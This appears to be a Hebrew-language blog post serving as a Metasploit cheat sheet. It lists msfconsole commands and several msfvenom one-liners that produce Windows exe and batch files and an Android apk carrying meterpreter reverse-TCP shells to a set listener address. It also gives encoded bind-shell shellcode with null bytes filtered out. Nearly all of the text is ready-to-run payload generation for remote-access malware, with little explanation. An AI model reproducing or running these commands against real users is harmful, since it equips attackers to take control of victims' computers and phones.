help - יציג את תפריט העזרה
help search - אפשרויות חיפוש
search reverse_tcp - יציג את כל המטענים הנבחרים
search cve:2010-024 - CVE חיפוש לפי
load - טעינה של כלים אל המערכת
use - שימוש בתוכנית
set - טעינה של מטען
back - חזרה אל הפקודה הקודמת
set lhost - IP הגדרת
set lport - הגדרת פורט
unset lhost - IP שחרור הגדרת
unset lport - שחרור הגדרת פורט
generate - Shellcode יוצר
generate -b \xff\x58 - Shellcode-סינון תווים מה
show encoders - שיטות קידוד של המטען המבוקש

Msfvenom
יצירת מטען זדוני, מסוג exe:

msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.0.3 lport=4444 -f exe > file.exe

יצירת מטען זדוני, מסוג bat:


msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.0.3 lport=4444 -f psh-cmd > file.bat

יצירת מטען זדוני, מסוג apk:

msfvenom -p android/meterpreter/reverse_tcp lhost=172.16.0.3 lport=4444 R > name.apk

יצירת Shellcode עבור Windows bind shell קידוד Shikata_ga_nai ללא Null bytes פורמט פייתון:

msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '\x00' -i 3 -f python

הצגת כל הפורמטים:
msfvenom --help-formats
Executable formats
asp, aspx, aspx-exe, dll, elf, elf-so, exe, exe-only, exe-service, exe-small,
hta-psh, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-net, psh-reflection,
psh-cmd, vba, vba-exe, vba-psh, vbs, war
Transform formats
bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl,
powershell, ps1, py, python, raw, rb, ruby, sh,
vbapplication, vbscript
Share To:

פאביו ליאור רחמים

Post A Comment: